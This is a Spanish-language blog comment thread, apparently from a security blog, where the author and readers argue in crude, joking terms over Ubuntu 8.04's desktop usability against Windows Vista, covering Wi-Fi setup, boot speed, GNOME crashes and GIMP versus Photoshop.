
sudo vista; así ubuntu irá tan mal como vista; aunque con más seguridad ya que ejecutas con sudo el equivalente a runas que pide contraseña, y no con la superior seguridad de vista que pide dar un click.

Y buen rollo Chema que cuando he leído un artículo que merezca la pena me has deleitado y cuando leo esto me haces partirme de risa; eres un buen bloggero. Por mi parte te diré que yo no he cambiado de Gutsy 7.10 a la 8.4 por X motivos: 1 Las nuevas versiones disponen de menos paquetes; 2 Trae varias beta por defecto y aunque yo no prefiero la cosas estables que son para la abuela que le puede dar un ataque al corazón; me parece que deben estar sólo cosas estables por defecto; 3 A mi me gusta personalizar el escritorio, y casi todo lo que trae la 8.4 ya lo tengo instalado, pero desde aquella no podría tener todo lo que tengo en mi Gutsy. Si quieres usar Ubuntu te recomiendo que pongas la anterior, tardarás más en configurarlo pero los beneficios son mayores.

Hasta Siempre.

@Prometeo Lucifer

Cómo ya deberías saber no le doro la pildora a ningún jefe. De hecho, si conocieras a mi jefe lo sabrías. Siento decirte que los dos, mi Ubuntu y mi Vista tienen la misma máquina: Un Dell Inspiron que todo el que haya venido a alguna charla en los dos últimos años habrá visto. Con dos Gigas de RAM los dos, etc... Y sí, el Vista arranca más rápido. En mi barrio los desafios se hacen con apuesta de por medio. ¿Quedamos y lo arrancamos?

Y no, no miento, el sistema de WIFI en Ubunto gráfico es UNA BASURA. Si te configuras una IP estática en la WIFI pierdes la posibilidad de escanear y ver las wifis de tu alrededor con la herramienta gráfica y tienes que hacer un iwlist wlan0 (o como se llame tu puta wifi) scanning, pero con las herramientas gráficas sale siempre el icono "KIMI RAIKONNEN" es decir, se la suda si hay conexión o no, es el mismo careto. Vamos, una bazofia en usabilidad.

Cuando hablo de usabilidad lo último que quiero es compilarme el código fuente de LINUX para hacer algo, si lo tengo que hacer me parece que la usabilidad ya resulta patética, pq no he tenido que recompilar ningún código en ningún Windows. Ni en el Windows 1.0.

Te podrá gustar o no lo que yo digo, pero no he dicho ninguna mentira, y si quieres, quedamos, nos tiramos unas fotos, nos tomamos algo y lo probamos. ¿Te animas?

Hasta siempre compañero!

FilEMASTER dijo...
A pero que un usuario domestico tiene que "configurar" su sistema operativo para poder usarlo....

Interesante...

@Filemaster, mientras sea sólo configurarlo vamos bien...

Maligno dijo...
Hola a todos!!

Bueno, esto de Ubuntu sigue siendo muy divertido. Cómo no quiero que penséis que os engaño acabo de traerme a Pedro Laguna, usuario de Ubuntu a jugar con el ubuntu en mi wifi y está siendo muy divertido. Varias cosas:

1.- Mi vista no estaba hibernado y arranca más rapido que el Ubuntu en el mismo equipo, con el mismo micro, la misma tarjeta SVGA, la misma memoria, etc...

2.- El Gnome mio ha petado el demonio de administración de preferencias (no me preguntéis porqué).

3.- En Ubuntu, si pones un perfil con configuración de IP estática pierdes la posibilidad de ver las redes wifi que hay a tu alcance con la herramienta. Y si dejas el descubrimiento no puedes poner con la herramienta gráfica la IP.

Si tocas el /etc/network/interfaces a manopla se pierde el descubrimiento de wifis, con lo que tienes que usar tu iwconfig.

Lo siento, no es mentira, el que quiera que venga a verlo a casita.

Me voy a traer a otro a "que me enseñe" a configurar una puta wifi para trabajar.

Sé que el router lo tengo cerca y puedo poner un cable, pero yo curro desde el baño y no me apetece cagar con la puerta abierta.

Saludos!

@Maligno, eres un guarro y un escatológico, comportate!

Xavier Sala dijo...
Yo habitualmente pruebo muchas distribuciones de Linux y ahora también estoy probando el nuevo Ubuntu.

Estoy bastante de acuerdo contigo en que no todo en Ubuntu es muy amigable, creo que en algunos puntos hay mucho más de fama que de realidad. Y aunque tengo que reconocer que ha mejorado mucho desde las primeras versiones muchas de las configuraciones que se hacen desde hace poco a través de entornos gráficos en Ubuntu (básico para un usuario novel) ya se podían hacer hace tiempo con otras distribuciones. (Por ejemplo con los denostados asistentes de Mandriva)

He cambiado el nombre al equipo y no se me ha colgado nada, ni me ha petado Firefox después de unas horas de navegación.

Explicanos como lo has hecho para ver si lo puedo reproducir.

Lo de GIMP era para provocar al personal, no? ;-). Supongo que a mi me pasa lo contrario que a ti. Al tener que trabajar en multiplataforma me acostumbré a GIMP (lo uso incluso en Vista) y cuando tengo que usar Photoshop no encuentro las cosas.

Saludos,

@Xavier Sala,

la verdad es que, después de oir y oir y oir a la gente diciendome lo fácil que era Ubutu y lo mucho que había mejorado había pensado en algo parecido a un MAC o Windows Vista y veo que aún no llega ni a un Windows XP (sin service pack ni nada) en usabilidad. Cuando digo usabilidad no hablo de Flip 3D de vista (que lo odio y doy gracias a dios a los de la corriente de Spectra que no quiso llenar el escritorio de gilipolleces que había algunos que querían hacer mil tonterías) ni a las ventanas flan (que me dan dolor de cabeza con los ojos) sino a USABILIDAD. Esto quiere decir hacer las cosas en menos tiempo por muchos factores.

Lo de la caida de Gnome es fácil, le pasé el nombre a Putubuntu y petó, tengo la captura que la publicaré con la lista de PRIMERAS quejas, como que no haya política de seguridad de contraseñas por defecto, como que el SUDO gráfico no sea bloqueante, la configuración por defecto del firewall y los mensajes de información "La aplicación (unknown)..."[esta aplicación es buena!". Actualizaciones sin certificados digitales en transito para luchar contra evilgrade, etc, etc, etc... ¡Qué a Windows se le mira con lupa y a esta UBUNTU se la consiente casi todo en los "mentideros" de Internet".

Lo del GIMP ya lo he explicado un poco más arriba y sí, creo que ha mejorado y voy a aprenderlo a manejar. ;)

Saludos!

Cubano dijo...
Lo del GIMP es normal. Cuando uno cambia de aplicación pasa lo que pasa. Yo, el primer día que abrí GIMP me dio un ataque, cada vez que tengo que hacer algo en Photoshop, suplico ayuda de una forma más lamentable que los lusers de Wardog y cuando vuelvo a mi Fireworks acaricio lascivamente el monitor mientras suspiro agradecido.

Si es que somos de costumbres.
(Y este fin de semana me toca conducir un coche que no es el mío, lo que para mí es peor que cambiar de SO).

@Cubano,

Estoy contigo, somos de costumbres y creo que a GIMP me voy a poder acostumbrar, también a Firefox y a Linux, el cual no creo que tenga que acostumbrarme, siempre puedo abrir la shell y configurar las cosas como siempre. Lo que estoy intentando probar la usabilidad de Ubuntu y me parece pésima comparada con la de Windows, pero ya lo iré poniendo aquí detalladamente.

Saludos!

Puli dijo...
Yo aun no he podido disfrutar del ubuntu en el portatil, como portatil, ya que el wifi no me la pilla y tengo que amarrarme con el cable... y bueno... lo de conectar mi movil en ubuntu para tener internet por él aun no lo e conseguido, no como con el Vista, aunque supongo ke al ser un Windows Mobile no sea posible... pero en otros mobiles también ocurre, como un siemens...

Salu2

@Puli, veo que tú tb disfrutas de cierta "usabilidad" ;) Saludos!

Kydorn dijo...
Pues yo tengo mi flamante (más bien horrible) k610i funcionando de p.m. bajo Hardy, incluso por bluetooth.

Josemaricariño, con respecto al flip3d, si te instalas el paquete compizconfig-settings-manager y activas el SwiftSwitcher verás que tiene un efecto muy similar al Flip3d de Vista, pero bastante más bonito y configurable...

Pablo

@Kydorn/Pablo,

lo del Flip 3d es irónico, no me gustan las gilipolleces en mi desktop. Yo lo uso para trabajar y quiero que las cosas vayan rápidas. Me parece muy chulo eso de las flan-windows, pero no lo activaré ni de coña. Me jode ya el glass, pq cuando hago capturas se trasparenta el fondo...

Saludos!

Saulo de Tarso dijo...
Creo que te estás aplicando tu propia acepción de TécnicoLess, sigo creyendo que un Windows XP SP2 actualizado le da un par de vueltas a Ubuntu, pero creo que estás exagerando lo que dices. Lo de GIMP es normal, cuando se cambia de aplicación, como cuando se cambia de Photopaint a Photoshop o a GIMP... pero a mi Ubuntu no me peta el firefox ni con flash ni con nada, es más, va mucho más rápido o eso "siento".

Usabilidad, ubuntu no sería el linux que le instalaría a mi madre, pero creo que es el más adecuado para escuelas y centros públicos. En las empresas y particulares, que cada una elija, normalmente, eligen Windows, buena parte por ignorancia y otra por no liarse con cosas nuevas, y claro... cuando la gente se compra juego... en linux no corre igual, o simplemente no corre.

Sólo que Ubuntu es gratis y abierto, hace mucho que me niego a instalar windows piratas a mis amigos, mejor un ubuntu que un windows desactualizado y descuidado. Yo tengo que lidiar con los dos todo el día y que quieres que te diga... pizcan pajas.

Bueno, acabo de leer lo que he puesto y está claro que no tengo coherencia ninguna... creo que es porque estoy trabajando con

PHP ahora :P

Saludos!

@Saludo de Tarso,

Estoy contigo con lo de GIMP, era power user de Phoshop en las versiones 3,4 y 5, pero para el uso que yo le doy hoy en día me basta con el GIMP y seguro que me acostumbraré. Arriba expliqué lo de GIMP.

Me parece bien que no os haya petado, pero a mi sí. A otros no les ha reconocido la wifi o la tarjeta de sonido y a mí sí.

Respecto a que Ubuntu es gratis... a mi, en horas de trabajo me ha costado más que las licencias de Vista, TE LO GARANTIZO. Así que Ubuntu es gratis... si tu tiempo no cuesta dinero (y esta frase no es mia).

Saludos!

Anónimo dijo...
Chema, déjate de Ubuntu's y cosas de esas para inútiles y pásate directamente a BackTrack.

@Anónimo, basta de experimentos. Cuando acabe esto me saco la certificacíon de LPI con Debian y vuelvo a mi escritorio con Windows Vista, que yo, para trabajar, prefiero el confort. Y me va como un tiro en mi DELL INSPIRON 6400.

david dijo...
Amigo mío, veo que usas Photoshop. Y también estoy de acuerdo en que hace muchas más cosas que Gimp, realmente es mejor, en serio. Como me imagino que eres grafista y haces retoques fotográficos profesionales en tus ratos libres necesitas un programa tan potente y complejo. Un hombre como tú, que le gusta colaborar con el soft de pago, espero que haya pagado la licencia del Photoshop que precisamente no es barata.

Me alegro, la especia debe fluir.

Saludetes no malignos. ;)

@David, la del Photoshop 4 cuando hacía retoques!! ahora ya no hago nada de eso y me apaño con el Paint que prefiero el dibujo a mano. No soy de los que prefiero el software de pago, sino lo que sea mejor en cada caso.

Saludos david, ya te contaré cuando aprenda GIMP si llega al nivel del Photoshop 5 que es último con el que "jugué".

Puli dijo...
@kydorn

Partiendo de la base de que soy un inutil en esto de la informática, ubuntu (gutsy) no me hace para nada la vida facil. Como ya dije antes no me puedo conectar a internet a traves de mi movil, un toshibs g500, tampoco puedo conectarme a la wifi de mi casa (supongo ke aun me tndre ke hexar otra tarde para investigar) y ese efectillo de flip3d de compiz tampoco funciona porque no me reconoce la grafica, al menos va en unos drivers genericos (supongo), ni siquiera puedo jugar al neverball en mis tiempos de ocio T_T.

Salu2

@Puli, no te disculpes, la usabilidad debéría ayudarte aunque no fueras un experto y a ti te está fallando. Suerte!

Sr.M0k0 dijo...
Noticia curiosa, haber si tu vas a saber menos de Ubuntu que esta "churri" XD

http://contentconsumer.wordpress.com/2008/04/27/is-ubuntu-useable-enough-for-my-girlfriend/

Saludos,

@Sr. M0k0, me alegra que a su novia le sea "suficiente", a mi, que tengo que hacer "alguna cosita en mi tiempo de trabajo" no me gusta y, por supuesto, que le ponga el Ubuntu a su novia, pero que no lo meta en ningún sistema informático que tenga que ver conmigo. ;)

Saludos!

Jandro dijo...
Yo no llevo ni medio dia con el Ubuntu nuevo y ya me a tocado recompilar el kernel, porque curiosamente hay un problema con la wifi broadcom de mi HP :'(

@Jandro, espero que haya suerte!. Con la usabilidad de Ubuntu... habrá sido darle a un botón en tu interfaz gráfico y kernel recompilado, ¿no?

gnucrash dijo...
Buenas chema... Vengo en son de paz.

Yo soy de debian por lo que no podia pasar sin probar ubuntu... y sigo usando debian.

* Fairfos es un sumidero de recursos, todos lo sabemos, contra eso no puedo hacer nada. Pero te recomiendo que elimines de tu instalación Gnash y su plugin para fairfos Y pasate a usar el plugin de flash de toda la vida. (A que yo no soy tan talibán como me pintaron chema)

* Ubuntu hace cosas fáciles muy simples y las difíciles, imposibles.

* Si echas de menos el 3d, depende que gráfica tengas, aunque con una simple intel, ubuntu se curra los efectos y cosas de esas que tanto le gustan a algunos.

Saludos.

PS: aunque no tiene que ver directamente con este post, sino con el anterior. Un 10 para tu última entrevista.

@gnucrash,

me instalé el plugin de Adobe. Cuando ví la lista... me insipiró más confianza ese. La explicación de tu segunda frase es única!, jaja. Na,na, lo del 3d es sólo una coña, a mi me gustan los interfaces simples!

Gracias por la felicitación de la entrevista, pero todo el mérito es de Luciano. Su blog está disponible en la siguiente URL: http://lbello.livejournal.com/

PePe dijo...
Maligno,
Contanos cuanto te pasa spectra por mes para que le hagais tanta propaganda.

@Pepe, pues un GIGAMILLON de Spectrines que será la moneda oficial cuando se domine el mundo. Mientras tanto, nada. ¿A alguien le pagan por defender Linux? Si es así ¡Viva Linux!

Maligno dijo...
Hola a todos!

veo que nos os habéis aburrido mientras yo no estaba por aquí, eh?. Bueno, nada, no os preocupéis, este puente os voy a ir poniendo los tutoríales de usabilidad en Ubuntu, porque, no se a vosotros, pero a mi me gusta, aunque tenga una IP estática en mi tarjeta wifi poder ver las wifis que hay disponibles en mi ámbito y con las herramientas gráficas pues te pasa como hacer el 69 con un hombre, que por un lado está bien pq se hace con tres clics, pero por el otro.... te comes una polla.

Prometo contestar todos y cada uno de los comentarios de este post, pero ahora.... me voy a tomar un café.

Saludos!

@Maligno, pero que bien escribes aunque tengas faltas de ortografía. Al menos, tu eres de los que no pone Hostia sin hache porque lo ha buscado en el diccionario de la Real Academia de la Lengua! Por cierto, has copiado una frase de Fuckowski copiota!! Saludos!

Anónimo dijo...
Ubuntu lo único que tiene al nivel de windows es la publicidad. Creo que no es un ejemplo de una buena distribución linux.
Están obsesionados en llegar a ser como windows, y como sigan sacando productos en estado beta lo van a conseguir.
Aun así Chema no te tortures de esta forma, ya sabes que hay monopolio para mucho tiempo, los que vivis del windows podéis estar tranquilos, no es necesario este espectáculo lamentable.
Muy buenas las entrevistas, mejor que esta mierda.

Antonio.

@Anónimo/Antonio, gracias por el comentario sobre las entrevistas. El resto del blog suele ser mierda, es lo habitual, pero en este caso es mi opinión sobre algo que me han estado lanzando hasta la saciedad. Saludos!

Nuño Martínez dijo...
Chema, tío, seguro que ya te lo han dicho pero paso de seguir leyendo comentarios:

1.- Si tan bien te fue con RedHat, ¿por qué pasaste a Ubuntu?

2.- Si tan mal te va con Gnome (y tu problema es Gnome, no Ubuntu, no confundamos términos) pásate a KDE (Kubuntu, vamos) que es muy distinto (no tienes que descargarte otra ISO: abre un terminal y escribe "sudo apt-get install kubuntu_desktop", cuando te pregunte dile "kdm" y antes de poner el usuario, cuando reinicies, dile que utilice el escritorio KDE o usará el

Gnome otra vez. Lo explico porque te veo muy torpe).

3.- QUEMA EL WIFI. Conéctate vía ethernet. Parece mentira que digas saber tanto y no lo sepas. El wifi se inventó para que los snobs puedan navegar con sus PDAs, no para trabajar.

4.- Vale, The GIMP no es el mejor programa de edición gráfica de la Historia, ni siquiera el del momento (a pesar de estar siendo utilizado en Hollywood para retocar los efectos especiales de las películas), pero tío, tampoco es el único: existen más herramientas para hacer capturas de pantalla y editarlas... ¿Que dónde están? ¿No te inspira nada la opción

"Añadir/eliminar programas" que aparece en el menú?

5.- Nadie ha dicho (o al menos yo nunca lo he oído ni leído) que GNU/Linux+X-Windows tarde menos en arrancar que Vista (bueno, con Aero sí). Aun así, ¿desde cuándo haces caso a la gente que habla bien de GNU/Linux? Y si quieres que arranque (y funcione) rápido, instala el escritorio Xfce (igual que he explicado para KDE, pero cambiando Kubuntu por Xubuntu). Tiene muchisisísimas menos chorradas que Gnome o KDE, de ahí que vaya mucho más suelto y es casi tan bonito (si lo configuras bien, claro) como MacOS.

6.- Si quieres un ordenador personal eficiente (no he dicho PC, he dicho "ordenador personal") cómprate un Apple, a ser posible de los que tienen PPC, no los Intel, porque gastan menos, hacen menos ruido y manejan mejor los gráficos.

De nada.

@Nuño Martinez,

1.- Porque me lo pidieron para hacer una prueba.

2.- Porque me han dicho que GNOME es el mejor hasta la saciedad. (Gracias por las ayudas técnicas!)

3.- Me gusta escribir desde el baño y no quiero cagar con la puerta abierta. Además, en verano me gusta trabajar desde la piscina.

4.- Sobre GIMP no voy a decir nada hasta que no lo pruebe más, he explicado más arriba mi "queja".

5.- Ni con AERO (Que lo tiene mi vista) arranca antes mi Ubuntu.

6.- De apple paso en canoa de momento, ya me "meteré" con él más adelante.

Saludos!

Alejandro el Canario dijo...

Bueno, bueno, como esta el patio.
Por si le sirve a alguien, yo voy a poner mi experiencia con Linux a nivel de Desktop.
Yo utilizo linux en la mayoría de mis servidores ya que casi todos son servidores web basados en apache y con soporte para PHP, Tomcat JBoss, etc..., si, lo siento soy algo javero :P.
Sin embargo, llevo mucho tiempo intentando trabajar con Linux en mis equipos de escritorio y siempre me encuentro con dos graves problemas a la hora de instalarlo (falta de soporte para algunos drivers y imposibilidad de instalar linux directamente sobre discos RAID, coexistiendo con otros sistema), así que le doy mi apoyo y mi pesame al pobre Maligno porque tiene una tarea complicada.

@Alejandro el Canario,

ahí está tu experiencia. En este caso las quejas van con usabilidad, pero... todo se andará. ;)

Saludos!

Anónimo dijo...
juasss, OpenSuse caca, pero RedHat peor ...
la mejor distro:

tachaaaan x-distro:
nice distro

@Anónimo, a mi RedHat me ha funcionado siempre bien, pero si quieres criticarla... no seré yo quien la defienda en El Lado del MAL!!!!

Saludos!

Batou dijo...
¿Quieres dolor de cabeza? Intenta instalar el DNI Electrónico y un lector de tarjetas en el Ubuntu!!! (Manda güebos)

@Batou,

bastante tengo con lo que tengo... paso de cosas graciosas. Al que quiera un reto que monte IPSec autenticado con Kerberos en Linux. Saludos!

Nasi dijo...
Pues yo me solidarizo al 120% con Chema.
A mi me ha pasado lo mismo, y he probado varias distribuciones.
No me parece para nada intuitivo Linux, es mucho menos compatible con multitud de dispositivos y tb peta.
Con esto no quiero decir que sea malo, sino que necesita un aprendizaje más extenso y técnico que con Windows esta a años luz de la facilidad de uso.
Por decirlo de otra manera, si con el Windows la gente novata ya alucina, con Linux ya ni se lo plantea...

@Nasi,

parece que sólo algunos nos damos cuenta de lo que es usabilidad en un desktop.... ;)

Saludos!

Hands On Lab

AZLAN D-LINK Academy

Windows Técnico

Archivo del blog

Blogs y Links